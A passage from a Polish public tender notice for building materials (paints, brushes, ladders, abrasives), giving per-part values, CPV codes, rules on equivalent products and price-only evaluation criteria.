później niż do końca czasu trwania umowy, na swój koszt.<br/>Materiały będące przedmiotem zamówienia jak i materiały równoważne objęte terminem przydatności do użycia, muszą posiadać co najmniej 3/4 terminu nominalnego licząc od dnia dostawy. Powyższe dotyczy formularza cenowego dla pozycji:<br/>część 2: 1-5, 7, 9-11, 14, 19, 31-32, 34-37, 43, 46, 49-50.<br/>Produkty odbierane będą przez Zamawiającego w obecności upoważnionego przedstawiciela Wykonawcy. Produkty mają być przedstawione przez Wykonawcę do odbioru w sposób pozwalający na dokonanie ich oceny zgodności z Umową. W przypadku dostawy farb Zamawiający wraz z dostawą wymaga dostarczenia kart charakterystyki produktu lub innego równoważnego dokumentu zawierającego informacje w szczególności na temat sposobu transportu, przechowywania i stosowania produktu.<br/>Informacje w szczególności na temat rozliczenia, warunków dostawy i gwarancji zawiera wzór umowy - załącznik nr 4 do SWZ.<br/>PRODUKTY RÓWNOWAŻNE:<br/>1. Jeżeli w dokumentach dotyczących zamówienia wskazana jest marka, producent lub nazwa własna, należy traktować to jako produkt przykładowy. Wykonawca może zaoferować produkt równoważny w stosunku do wskazanego przez Zamawiającego. Produkty równoważne muszą posiadać parametry techniczne nie gorsze niż te wyszczególnione w formularzu cenowym - załączniku nr 3a do SWZ.<br/>2. Zastosowanie materiałów równoważnych nie może naruszać warunków gwarancji lub powodować jej utraty.<br/>3. Zamawiający dopuszcza oferowanie produktów równoważnych, ale ciężar udowodnienia równoważności spoczywa na Wykonawcy. W związku z tym, Wykonawca, który oferuje rozwiązania równoważne, musi w sposób niekwestionowany wykazać w ofercie, że spełniają one wymagania określone przez Zamawiającego (kryteria równoważności).<br/>4.Wykonawca oferując produkt równoważny w pozycjach, w których Zamawiający dopuścił zaoferowanie takich produktów tj. opatrzonych wpisem „lub równoważny” obowiązany jest podać w Formularzu cenowym – załącznik nr 3a do SWZ (w kolumnie „Równoważność”) dokładną nazwę i opis produktu równoważnego (wskazanie producenta, nazwy produktu itp.), na podstawie którego Zamawiający będzie mógł bezspornie zidentyfikować oferowany asortyment oraz zapoznać się z jego parametrami technicznymi. Brak jednoznacznego wskazania powyższych parametrów, uniemożliwiającego w sposób niebudzący wątpliwości identyfikację produktu zaoferowanego jako równoważny przez Wykonawcę na etapie składania ofert skutkować będzie odrzuceniem oferty jako niezgodnej z warunkami zamówienia.<br/>5. Brak wskazania przez Wykonawcę produktów równoważnych (tj. brak wypełnienia kolumny „Równoważność” w Formularzu cenowym – załącznik nr 3a do SWZ), jednoznacznie świadczy o tym, że Wykonawca nie oferuje produktów równoważnych, a wyłącznie te wskazane przez Zamawiającego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 39573,49 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44111000-1 - Materiały budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Cena oferty uwzględniać powinna wszystkie zobowiązania związane z realizacją zamówienia (w ramach części, na którą składana jest oferta), musi być skalkulowania w walucie polskiego złotego (PLN) cyfrowo i słownie, z wyodrębnieniem wartości należnego podatku VAT.<br/>2. Cena podana w ofercie w ramach każdej części zamówienia powinna obejmować wszystkie koszty powstałe w wyniku realizacji zamówienia zgodnie z warunkami stawianymi przez Zamawiającego.<br/>3. Cena może być tylko jedna, nie dopuszcza się składania ofert wariantowych.<br/>4. Cena nie ulega zmianie przez okres ważności oferty (termin związania ofertą) oraz okres realizacji zamówienia z zastrzeżeniem możliwości zmiany umowy.<br/>5. Zamawiający wymaga wyceny każdej pozycji w formularzu cenowym w zakresie części, na którą Wykonawca składa ofertę.<br/>6. Cena netto to cena ustalona za jednostkę towaru, której ilość lub liczba jest wyrażona w jednostkach miar w rozumieniu przepisów o miarach (bez kwoty podatku VAT).<br/>7. Wartość netto to wartość towaru, którego dotyczy dostawa, bez kwoty podatku (iloczyn ceny jednostkowej netto i ilości towaru).<br/>8. Podatek VAT to kwota podatku od towarów i usług, obliczona według obowiązującej stawki procentowej.<br/>9. Wartość brutto zamówienia to całkowita wartość przedmiotu zamówienia wraz z kwotą podatku VAT (suma wartości netto i wartości podatku VAT) wg podanej ilości asortymentu w okresie realizacji umowy. Stanowi ona podstawę oceny ofert (w zakresie każdej z części zamówienia).<br/>10. Cenę za wykonanie przedmiotu zamówienia (tj. wartość brutto zamówienia dla danej części) należy skalkulować przy pomocy Formularza cenowego – załącznik odpowiednio nr 3a lub 3b do SWZ oraz przedstawić w Formularzu ofertowym ̶ załącznik nr 1 do SWZ.<br/>11. Formularz cenowy – załącznik nr 3a i 3b do SWZ udostępniany jest przez Zamawiającego w wersji edytowalnej (MS Excel). Wykonawca uzupełnia puste pola w następujący sposób:<br/>„Cena netto” – należy wpisać cenę jednostkową netto;<br/>Pozostałe wartości powinny zostać obliczone automatycznie, ale wskazane jest sprawdzenie i ewentualne skorygowanie poprawności przeprowadzonej kalkulacji ceny oferty.<br/>12. Podstawę oceny i porównania ofert stanowi cena brutto za wykonanie zamówienia, wpisana w formularzu ofertowym (załącznik nr 1 do SWZ) na podstawie ceny przedstawionej/wyliczonej w formularzu cenowym (załącznik nr 3a lub/i 3b do SWZ) w zakresie każdej z części zamówienia.<br/>13. Przy wyliczaniu poszczególnych wartości netto i brutto należy ograniczyć się do dwóch miejsc po przecinku na każdym etapie wyliczenia ceny. Kwoty wykazane w ofercie zaokrągla się do pełnych groszy, przy czym końcówki poniżej 0,5 grosza pomija się, a końcówki 0,5 grosza i wyższe zaokrągla się do 1 grosza.<br/>14. W przypadku rozbieżności cen w formularzu cenowym i ofertowym Zamawiający do oceny i porównania ofert przyjmie, że Wykonawca oferuje wykonanie zamówienia za cenę wpisaną/wyliczoną w formularzu cenowym.<br/>15. Za najkorzystniejszą zostanie uznana oferta, która uzyska największą sumę punktów w oparciu o ustalone kryterium cena 100%.<br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 100. Pozostałe oferty zostaną przeliczone według wzoru w SWZ. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/>16. Oferta, która otrzyma najwięcej punktów w kryterium „cena oferty” zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.<br/>17. Jeżeli wybór najkorzystniejszej oferty będzie niemożliwy z uwagi na to, że zostały złożone oferty o takiej samej cenie Zamawiający wezwie Wykonawców do złożenia oferty dodatkowej.<br/>18. Brak określenia w ofercie ceny spowoduje odrzucenie oferty jako niezgodnej z treścią SWZ. Brak formularza cenowego, załączonego do oferty spowoduje odrzucenie oferty Wykonawcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa materiałów ogólnobudowlanych:<br/>Część 3 – Pędzle;<br/>Zakres i rodzaj asortymentu, ilość, typ opakowań i inne istotne elementy dotyczące opisu przedmiotu zamówienia zostały określone w:<br/>- Formularzu cenowym dla części 3,4,5 - załącznik nr 3b do SWZ;<br/>- Opisie przedmiotu zamówienia (dla części 3, 4, 5 zamówienia) – załącznik nr 5 do umowy.<br/><br/>Przedmiotem zamówienia jest zakup nowych artykułów ogólnobudowlanych w ilościach, opakowaniach i rodzaju wyszczególnionym w formularzu cenowym – załącznik nr 3b do SWZ oraz w Opisie przedmiotu zamówienia- załącznik nr 5 do SWZ;<br/>Przedmiot zamówienia powinien być dostarczony w oryginalnych, jednostkowych opakowaniach producenta.<br/>Dostarczony przez Wykonawcę materiał musi być fabrycznie nowy.<br/>Wykonawca zapewnia Zamawiającemu wysoką jakość materiałów zgodnie z parametrami określonymi w dokumentach zamówienia.<br/>W przypadku, gdy dostarczony towar (w części lub całości) nie będzie odpowiadał opisowi określonemu w formularzu cenowym – Zamawiający odmówi przyjęcia towaru, a Wykonawca zobowiązany będzie do dostarczenia towaru zgodnego z przedmiotem zamówienia w terminie 14 dni od dnia odmowy przyjęcia, jednak nie później niż do końca czasu trwania umowy, na swój koszt.<br/>Dostarczony przedmiot umowy, w tym wszystkie jego elementy montażowe itp. (jeżeli występują) winny zostać odpowiednio zabezpieczone przed utratą jego jakichkolwiek walorów użytkowych oraz być oznakowane w sposób umożliwiający ich jednoznaczną identyfikację.<br/> Informacje w szczególności na temat rozliczenia, warunków dostawy i gwarancji zawiera wzór umowy - załącznik nr 4 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 1593,05 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39224210-3 - Pędzle malarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Cena oferty uwzględniać powinna wszystkie zobowiązania związane z realizacją zamówienia (w ramach części, na którą składana jest oferta), musi być skalkulowania w walucie polskiego złotego (PLN) cyfrowo i słownie, z wyodrębnieniem wartości należnego podatku VAT.<br/>2. Cena podana w ofercie w ramach każdej części zamówienia powinna obejmować wszystkie koszty powstałe w wyniku realizacji zamówienia zgodnie z warunkami stawianymi przez Zamawiającego.<br/>3. Cena może być tylko jedna, nie dopuszcza się składania ofert wariantowych.<br/>4. Cena nie ulega zmianie przez okres ważności oferty (termin związania ofertą) oraz okres realizacji zamówienia z zastrzeżeniem możliwości zmiany umowy.<br/>5. Zamawiający wymaga wyceny każdej pozycji w formularzu cenowym w zakresie części, na którą Wykonawca składa ofertę.<br/>6. Cena netto to cena ustalona za jednostkę towaru, której ilość lub liczba jest wyrażona w jednostkach miar w rozumieniu przepisów o miarach (bez kwoty podatku VAT).<br/>7. Wartość netto to wartość towaru, którego dotyczy dostawa, bez kwoty podatku (iloczyn ceny jednostkowej netto i ilości towaru).<br/>8. Podatek VAT to kwota podatku od towarów i usług, obliczona według obowiązującej stawki procentowej.<br/>9. Wartość brutto zamówienia to całkowita wartość przedmiotu zamówienia wraz z kwotą podatku VAT (suma wartości netto i wartości podatku VAT) wg podanej ilości asortymentu w okresie realizacji umowy. Stanowi ona podstawę oceny ofert (w zakresie każdej z części zamówienia).<br/>10. Cenę za wykonanie przedmiotu zamówienia (tj. wartość brutto zamówienia dla danej części) należy skalkulować przy pomocy Formularza cenowego – załącznik odpowiednio nr 3a lub 3b do SWZ oraz przedstawić w Formularzu ofertowym ̶ załącznik nr 1 do SWZ.<br/>11. Formularz cenowy – załącznik nr 3a i 3b do SWZ udostępniany jest przez Zamawiającego w wersji edytowalnej (MS Excel). Wykonawca uzupełnia puste pola w następujący sposób:<br/>„Cena netto” – należy wpisać cenę jednostkową netto;<br/>Pozostałe wartości powinny zostać obliczone automatycznie, ale wskazane jest sprawdzenie i ewentualne skorygowanie poprawności przeprowadzonej kalkulacji ceny oferty.<br/>12. Podstawę oceny i porównania ofert stanowi cena brutto za wykonanie zamówienia, wpisana w formularzu ofertowym (załącznik nr 1 do SWZ) na podstawie ceny przedstawionej/wyliczonej w formularzu cenowym (załącznik nr 3a lub/i 3b do SWZ) w zakresie każdej z części zamówienia.<br/>13. Przy wyliczaniu poszczególnych wartości netto i brutto należy ograniczyć się do dwóch miejsc po przecinku na każdym etapie wyliczenia ceny. Kwoty wykazane w ofercie zaokrągla się do pełnych groszy, przy czym końcówki poniżej 0,5 grosza pomija się, a końcówki 0,5 grosza i wyższe zaokrągla się do 1 grosza.<br/>14. W przypadku rozbieżności cen w formularzu cenowym i ofertowym Zamawiający do oceny i porównania ofert przyjmie, że Wykonawca oferuje wykonanie zamówienia za cenę wpisaną/wyliczoną w formularzu cenowym.<br/>15. Za najkorzystniejszą zostanie uznana oferta, która uzyska największą sumę punktów w oparciu o ustalone kryterium cena 100%.<br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 100. Pozostałe oferty zostaną przeliczone według wzoru w SWZ. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/>16. Oferta, która otrzyma najwięcej punktów w kryterium „cena oferty” zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.<br/>17. Jeżeli wybór najkorzystniejszej oferty będzie niemożliwy z uwagi na to, że zostały złożone oferty o takiej samej cenie Zamawiający wezwie Wykonawców do złożenia oferty dodatkowej.<br/>18. Brak określenia w ofercie ceny spowoduje odrzucenie oferty jako niezgodnej z treścią SWZ. Brak formularza cenowego, załączonego do oferty spowoduje odrzucenie oferty Wykonawcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa materiałów ogólnobudowlanych:<br/>Część 4 – Drabiny;<br/>Zakres i rodzaj asortymentu, ilość, typ opakowań i inne istotne elementy dotyczące opisu przedmiotu zamówienia zostały określone w:<br/>- Formularzu cenowym dla części 3,4,5 - załącznik nr 3b do SWZ;<br/>- Opisie przedmiotu zamówienia (dla części 3, 4, 5 zamówienia) – załącznik nr 5 do umowy.<br/>Przedmiotem zamówienia jest zakup nowych artykułów ogólnobudowlanych w ilościach, opakowaniach i rodzaju wyszczególnionym w formularzu cenowym – załącznik nr 3b do SWZ oraz w Opisie przedmiotu zamówienia- załącznik nr 5 do SWZ;<br/>Przedmiot zamówienia powinien być dostarczony w oryginalnych, jednostkowych opakowaniach producenta.<br/>Dostarczony przez Wykonawcę materiał musi być fabrycznie nowy.<br/>Wykonawca zapewnia Zamawiającemu wysoką jakość materiałów zgodnie z parametrami określonymi w dokumentach zamówienia.<br/>W przypadku, gdy dostarczony towar (w części lub całości) nie będzie odpowiadał opisowi określonemu w formularzu cenowym – Zamawiający odmówi przyjęcia towaru, a Wykonawca zobowiązany będzie do dostarczenia towaru zgodnego z przedmiotem zamówienia w terminie 14 dni od dnia odmowy przyjęcia, jednak nie później niż do końca czasu trwania umowy, na swój koszt.<br/>Dostarczony przedmiot umowy, w tym wszystkie jego elementy montażowe itp. (jeżeli występują) winny zostać odpowiednio zabezpieczone przed utratą jego jakichkolwiek walorów użytkowych oraz być oznakowane w sposób umożliwiający ich jednoznaczną identyfikację.<br/>Informacje w szczególności na temat rozliczenia, warunków dostawy i gwarancji zawiera wzór umowy - załącznik nr 4 do SWZ.<br/>PRODUKTY RÓWNOWAŻNE:<br/>1. Jeżeli w dokumentach dotyczących zamówienia wskazana jest marka, producent lub nazwa własna, należy traktować to jako produkt przykładowy. Wykonawca może zaoferować produkt równoważny w stosunku do wskazanego przez Zamawiającego (część 4 zamówienia oraz cześć 5 zamówienia – w pozycjach od 1 do 10). Produkty równoważne muszą posiadać parametry techniczne nie gorsze niż te wyszczególnione w formularzu cenowym - załączniku nr 3b do SWZ oraz OPZ- załącznik nr 5 do SWZ.<br/>2. Zastosowanie materiałów równoważnych nie może naruszać warunków gwarancji lub powodować jej utraty.<br/>3. Zamawiający dopuszcza oferowanie produktów równoważnych, ale ciężar udowodnienia równoważności spoczywa na Wykonawcy. W związku z tym, Wykonawca, który oferuje rozwiązania równoważne, musi w sposób niekwestionowany wykazać w ofercie, że spełniają one wymagania określone przez Zamawiającego.<br/>4. Zamawiający w części 4 oraz w części 5 w poz. 1-10 dopuszcza zaoferowanie produktów równoważnych. Wykonawca oferując produkt równoważny we wskazanych pozycjach, obowiązany jest podać w Formularzu cenowym – załącznik nr 3b do SWZ (w kolumnie „Równoważność”) dokładną nazwę i opis produktu równoważnego (wskazanie producenta, nazwy produktu, symbolu katalogowego - jeśli produkt taki posiada itp.), na podstawie którego Zamawiający będzie mógł bezspornie zidentyfikować oferowany asortyment oraz zapoznać się z jego parametrami technicznymi. Brak jednoznacznego wskazania powyższych parametrów, uniemożliwiającego w sposób niebudzący wątpliwości identyfikację produktu zaoferowanego jako równoważny przez Wykonawcę na etapie składania ofert skutkować będzie odrzuceniem oferty jako niezgodnej z warunkami zamówienia.<br/>5. Brak wskazania przez Wykonawcę produktów równoważnych (tj. brak wypełnienia kolumny „Równoważność” w Formularzu cenowym – załącznik nr 3b do SWZ), jednoznacznie świadczy o tym, że Wykonawca nie oferuje produktów równoważnych, a wyłącznie te wskazane przez Zamawiającego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 18962,65 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44423200-3 - Drabiny</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Cena oferty uwzględniać powinna wszystkie zobowiązania związane z realizacją zamówienia (w ramach części, na którą składana jest oferta), musi być skalkulowania w walucie polskiego złotego (PLN) cyfrowo i słownie, z wyodrębnieniem wartości należnego podatku VAT.<br/>2. Cena podana w ofercie w ramach każdej części zamówienia powinna obejmować wszystkie koszty powstałe w wyniku realizacji zamówienia zgodnie z warunkami stawianymi przez Zamawiającego.<br/>3. Cena może być tylko jedna, nie dopuszcza się składania ofert wariantowych.<br/>4. Cena nie ulega zmianie przez okres ważności oferty (termin związania ofertą) oraz okres realizacji zamówienia z zastrzeżeniem możliwości zmiany umowy.<br/>5. Zamawiający wymaga wyceny każdej pozycji w formularzu cenowym w zakresie części, na którą Wykonawca składa ofertę.<br/>6. Cena netto to cena ustalona za jednostkę towaru, której ilość lub liczba jest wyrażona w jednostkach miar w rozumieniu przepisów o miarach (bez kwoty podatku VAT).<br/>7. Wartość netto to wartość towaru, którego dotyczy dostawa, bez kwoty podatku (iloczyn ceny jednostkowej netto i ilości towaru).<br/>8. Podatek VAT to kwota podatku od towarów i usług, obliczona według obowiązującej stawki procentowej.<br/>9. Wartość brutto zamówienia to całkowita wartość przedmiotu zamówienia wraz z kwotą podatku VAT (suma wartości netto i wartości podatku VAT) wg podanej ilości asortymentu w okresie realizacji umowy. Stanowi ona podstawę oceny ofert (w zakresie każdej z części zamówienia).<br/>10. Cenę za wykonanie przedmiotu zamówienia (tj. wartość brutto zamówienia dla danej części) należy skalkulować przy pomocy Formularza cenowego – załącznik odpowiednio nr 3a lub 3b do SWZ oraz przedstawić w Formularzu ofertowym ̶ załącznik nr 1 do SWZ.<br/>11. Formularz cenowy – załącznik nr 3a i 3b do SWZ udostępniany jest przez Zamawiającego w wersji edytowalnej (MS Excel). Wykonawca uzupełnia puste pola w następujący sposób:<br/>„Cena netto” – należy wpisać cenę jednostkową netto;<br/>Pozostałe wartości powinny zostać obliczone automatycznie, ale wskazane jest sprawdzenie i ewentualne skorygowanie poprawności przeprowadzonej kalkulacji ceny oferty.<br/>12. Podstawę oceny i porównania ofert stanowi cena brutto za wykonanie zamówienia, wpisana w formularzu ofertowym (załącznik nr 1 do SWZ) na podstawie ceny przedstawionej/wyliczonej w formularzu cenowym (załącznik nr 3a lub/i 3b do SWZ) w zakresie każdej z części zamówienia.<br/>13. Przy wyliczaniu poszczególnych wartości netto i brutto należy ograniczyć się do dwóch miejsc po przecinku na każdym etapie wyliczenia ceny. Kwoty wykazane w ofercie zaokrągla się do pełnych groszy, przy czym końcówki poniżej 0,5 grosza pomija się, a końcówki 0,5 grosza i wyższe zaokrągla się do 1 grosza.<br/>14. W przypadku rozbieżności cen w formularzu cenowym i ofertowym Zamawiający do oceny i porównania ofert przyjmie, że Wykonawca oferuje wykonanie zamówienia za cenę wpisaną/wyliczoną w formularzu cenowym.<br/>15. Za najkorzystniejszą zostanie uznana oferta, która uzyska największą sumę punktów w oparciu o ustalone kryterium cena 100%.<br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 100. Pozostałe oferty zostaną przeliczone według wzoru w SWZ. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/>16. Oferta, która otrzyma najwięcej punktów w kryterium „cena oferty” zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.<br/>17. Jeżeli wybór najkorzystniejszej oferty będzie niemożliwy z uwagi na to, że zostały złożone oferty o takiej samej cenie Zamawiający wezwie Wykonawców do złożenia oferty dodatkowej.<br/>18. Brak określenia w ofercie ceny spowoduje odrzucenie oferty jako niezgodnej z treścią SWZ. Brak formularza cenowego, załączonego do oferty spowoduje odrzucenie oferty Wykonawcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa materiałów ogólnobudowlanych:<br/>Część 5 – Wyroby ścierne.<br/>Zakres i rodzaj asortymentu, ilość, typ opakowań i inne istotne elementy dotyczące opisu przedmiotu zamówienia zostały określone w:<br/>- Formularzu cenowym dla części 3,4,5 - załącznik nr 3b do SWZ;<br/>- Opisie przedmiotu zamówienia (dla części 3, 4, 5 zamówienia) – załącznik nr 5 do umowy.<br/>Przedmiotem zamówienia jest zakup nowych artykułów ogólnobudowlanych w ilościach, opakowaniach i rodzaju wyszczególnionym w formularzu cenowym – załącznik nr 3b do SWZ oraz w Opisie przedmiotu zamówienia- załącznik nr 5 do SWZ;<br/>Przedmiot zamówienia powinien być dostarczony w oryginalnych, jednostkowych opakowaniach producenta.<br/>Dostarczony przez Wykonawcę materiał musi być fabrycznie nowy.<br/>Wykonawca zapewnia Zamawiającemu wysoką jakość materiałów zgodnie z parametrami określonymi w dokumentach zamówienia.<br/>W przypadku, gdy dostarczony towar (w części lub całości) nie będzie odpowiadał opisowi określonemu w formularzu cenowym – Zamawiający odmówi przyjęcia towaru, a Wykonawca zobowiązany będzie do dostarczenia towaru zgodnego z przedmiotem zamówienia w terminie 14 dni od dnia odmowy przyjęcia, jednak nie później niż do końca czasu trwania umowy, na swój koszt.<br/>Dostarczony przedmiot umowy, w tym wszystkie jego elementy montażowe itp. (jeżeli występują) winny zostać odpowiednio zabezpieczone przed utratą jego jakichkolwiek walorów użytkowych oraz być oznakowane w sposób umożliwiający ich jednoznaczną identyfikację.<br/>Informacje w szczególności na temat rozliczenia, warunków dostawy i gwarancji zawiera wzór umowy - załącznik nr 4 do SWZ.<br/>PRODUKTY RÓWNOWAŻNE:<br/>1. Jeżeli w dokumentach dotyczących zamówienia wskazana jest marka, producent lub nazwa własna, należy traktować to jako produkt przykładowy. Wykonawca może zaoferować produkt równoważny w stosunku do wskazanego przez Zamawiającego (część 4 zamówienia oraz cześć 5 zamówienia – w pozycjach od 1 do 10). Produkty równoważne muszą posiadać parametry techniczne nie gorsze niż te wyszczególnione w formularzu cenowym - załączniku nr 3b do SWZ oraz OPZ- załącznik nr 5 do SWZ.<br/>2. Zastosowanie materiałów równoważnych nie może naruszać warunków gwarancji lub powodować jej utraty.<br/>3. Zamawiający dopuszcza oferowanie produktów równoważnych, ale ciężar udowodnienia równoważności spoczywa na Wykonawcy. W związku z tym, Wykonawca, który oferuje rozwiązania równoważne, musi w sposób niekwestionowany wykazać w ofercie, że spełniają one wymagania określone przez Zamawiającego.<br/>4. Zamawiający w części 4 oraz w części 5 w poz. 1-10 dopuszcza zaoferowanie produktów równoważnych. Wykonawca oferując produkt równoważny we wskazanych pozycjach, obowiązany jest podać w Formularzu cenowym – załącznik nr 3b do SWZ (w kolumnie „Równoważność”) dokładną nazwę i opis produktu równoważnego (wskazanie producenta, nazwy produktu, symbolu katalogowego - jeśli produkt taki posiada itp.), na podstawie którego Zamawiający będzie mógł bezspornie zidentyfikować oferowany asortyment oraz zapoznać się z jego parametrami technicznymi. Brak jednoznacznego wskazania powyższych parametrów, uniemożliwiającego w sposób niebudzący wątpliwości identyfikację produktu zaoferowanego jako równoważny przez Wykonawcę na etapie składania ofert skutkować będzie odrzuceniem oferty jako niezgodnej z warunkami zamówienia.<br/>5. Brak wskazania przez Wykonawcę produktów równoważnych (tj. brak wypełnienia kolumny „Równoważność” w Formularzu cenowym – załącznik nr 3b do SWZ), jednoznacznie świadczy o tym, że Wykonawca nie oferuje produktów równoważnych, a wyłącznie te wskazane przez Zamawiającego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 16017,28 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">14810000-2 - Wyroby ścierne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Cena oferty uwzględniać powinna wszystkie zobowiązania związane z realizacją zamówienia (w ramach części, na którą składana jest oferta), musi być skalkulowania w walucie polskiego złotego (PLN) cyfrowo i słownie, z wyodrębnieniem wartości należnego podatku VAT.<br/>2. Cena podana w ofercie w ramach każdej części zamówienia powinna obejmować wszystkie koszty powstałe w wyniku realizacji zamówienia zgodnie z warunkami stawianymi przez Zamawiającego.<br/>3. Cena może być tylko jedna, nie dopuszcza się składania ofert wariantowych.<br/>4. Cena nie ulega zmianie przez okres ważności oferty (termin związania ofertą) oraz okres realizacji zamówienia z zastrzeżeniem możliwości zmiany umowy.<br/>5. Zamawiający wymaga wyceny każdej pozycji w formularzu cenowym w zakresie części, na którą Wykonawca składa ofertę.<br/>6. Cena netto to cena ustalona za jednostkę towaru, której ilość lub liczba jest wyrażona w jednostkach miar w rozumieniu przepisów o miarach (bez kwoty podatku VAT).<br/>7. Wartość netto to wartość towaru, którego dotyczy dostawa, bez kwoty podatku (iloczyn ceny jednostkowej netto i ilości towaru).<br/>8. Podatek VAT to kwota podatku od towarów i usług, obliczona według obowiązującej stawki procentowej.<br/>9. Wartość brutto 